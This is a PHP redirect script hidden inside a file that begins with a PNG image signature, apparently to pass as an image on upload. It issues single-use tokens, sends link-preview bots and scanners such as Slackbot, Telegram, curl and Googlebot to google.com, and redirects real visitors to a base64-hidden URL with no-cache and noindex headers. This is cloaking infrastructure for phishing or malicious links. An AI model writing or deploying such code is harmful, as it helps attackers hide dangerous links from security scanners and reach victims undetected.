?
 PNG      %k25u25%fgd5n!<?php
session_start();

$token = $_GET['token'] ?? '';

if (!isset($_SESSION['redirect_token']) || $_SESSION['redirect_token'] !== $token) {
    http_response_code(404);
    echo "Not Found";
    exit();
}

$file = 'tokens.json';
$tokens = file_exists($file) ? json_decode(file_get_contents($file), true) : [];

if (!isset($tokens[$token])) {
    http_response_code(404);
    echo "Not Found";
    exit();
}

$data = $tokens[$token];

if (time() > $data['expires']) {
    http_response_code(404);
    echo "Not Found";
    exit();
}

if ($data['used']) {
    http_response_code(404);
    echo "Not Found";
    exit();
}

// Mark token as used
$tokens[$token]['used'] = true;
file_put_contents($file, json_encode($tokens));

// Bot detection
function is_bot($ua) {
    $bots = ['facebook', 'Twitter', 'Slackbot', 'Telegram', 'WhatsApp', 'Googlebot', 'curl', 'wget', 'bot'];
    foreach ($bots as $bot) {
        if (stripos($ua, $bot) !== false) return true;
    }
    return false;
}

$user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
if (is_bot($user_agent)) {
    // Redirect bots to google.com
    header("Location: https://www.google.com", true, 302);
    exit();
}

// Decode URL from Base64
$decoded_url = base64_decode($data['url']);
if ($decoded_url === false) {
    http_response_code(500);
    echo "Server error";
    exit();
}

// Redirect valid users immediately
header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0");
header("Pragma: no-cache");
header("X-Robots-Tag: noindex, nofollow");
header("Location: $decoded_url", true, 302);
exit();